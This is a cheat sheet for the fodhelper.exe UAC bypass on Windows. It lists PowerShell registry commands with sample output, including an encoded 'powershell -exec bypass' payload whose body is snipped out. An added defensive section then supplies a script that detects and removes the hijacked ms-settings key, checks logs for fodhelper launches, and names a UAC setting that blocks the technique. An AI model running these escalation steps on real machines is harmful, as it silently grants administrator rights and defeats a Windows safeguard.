Leveraging Auto-elevated Windows Binaries
1. Create Registry Key for Command Execution
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
Sample Output:
PS C:\Users\rainbow\Desktop> New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
Hive: HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open
Name Property
---- --------
command
2. Set DelegateExecute Property to Enable Command
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Sample Output:
PS C:\Users\rainbow\Desktop> New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
DelegateExecute :
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open
PSChildName : command
PSDrive : HKCU
PSProvider : Microsoft.PowerShell.Core\Registry
3. Configure Command to Execute with Elevated Privileges
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "<CMD>" -Force
Sample Output:
PS C:\Users\rainbow\Desktop> Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -exec bypass -e ---[SNIP]---" -Force
4. Execute Fodhelper to Trigger UAC Bypass
C:\Windows\System32\fodhelper.exe
Sample Output:
C:\Windows\System32\fodhelper.exe
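The four steps above leave a single, easily checked artifact: a user-writable ms-settings handler under HKCU with an empty DelegateExecute value and a command in (default). The following PowerShell is an added audit example, not part of the original cheat sheet; the function names Test-MsSettingsHijack and Get-FodhelperLaunches are hypothetical. It assumes a default Windows install, where the ms-settings protocol handler lives under HKLM (seen through HKCR), so the HKCU key normally does not exist at all.

```powershell
# Added example (not from the original page): audit the current user's hive for
# the ms-settings override described in steps 1-3, report it, and optionally
# remove it. Function names are hypothetical.

function Test-MsSettingsHijack {
    [CmdletBinding()]
    param(
        # Remove the override subtree after reporting it.
        [switch]$Remediate
    )

    $keyPath = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'

    # Assumption (default install): this key is absent unless someone created it.
    if (-not (Test-Path -Path $keyPath)) {
        return [PSCustomObject]@{
            Suspicious      = $false
            KeyPresent      = $false
            DelegateExecute = $null
            Command         = $null
            Remediated      = $false
        }
    }

    $key = Get-Item -Path $keyPath
    # GetValue('') reads the (default) value; $null means the value is not set.
    $command  = $key.GetValue('')
    $delegate = $key.GetValue('DelegateExecute')

    # An empty DelegateExecute makes the shell run (default) instead of the COM
    # handler; either indicator alone is enough to flag the key for review.
    $suspicious = ($null -ne $delegate) -or (-not [string]::IsNullOrEmpty($command))

    $removed = $false
    if ($Remediate -and $suspicious) {
        # The user hive should not carry an ms-settings handler at all, so drop
        # the whole subtree rather than individual values.
        Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
        $removed = $true
    }

    [PSCustomObject]@{
        Suspicious      = $suspicious
        KeyPresent      = $true
        DelegateExecute = $delegate
        Command         = $command
        Remediated      = $removed
    }
}

# Correlate the registry finding with an actual trigger: recent process-creation
# events (Security 4688, requires process creation auditing and an elevated
# session to read the Security log) that mention fodhelper.exe.
function Get-FodhelperLaunches {
    param([int]$Hours = 24)

    $since = (Get-Date).AddHours(-$Hours)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'fodhelper\.exe' } |
        Select-Object TimeCreated, Id, @{ Name = 'Summary'; Expression = { ($_.Message -split "`n")[0] } }
}

# Usage:
Test-MsSettingsHijack                 # report only
Test-MsSettingsHijack -Remediate      # report and remove the override
Get-FodhelperLaunches -Hours 48       # recent fodhelper.exe process creations
```

Run the audit per user profile (the key is in HKCU, so each interactive user has their own copy), and treat a KeyPresent result as worth a look even when Suspicious is false. The bypass also depends on fodhelper.exe auto-elevating without a prompt, which only happens at the default UAC level; raising UAC to "Always notify" removes that silent elevation and is the configuration-level mitigation.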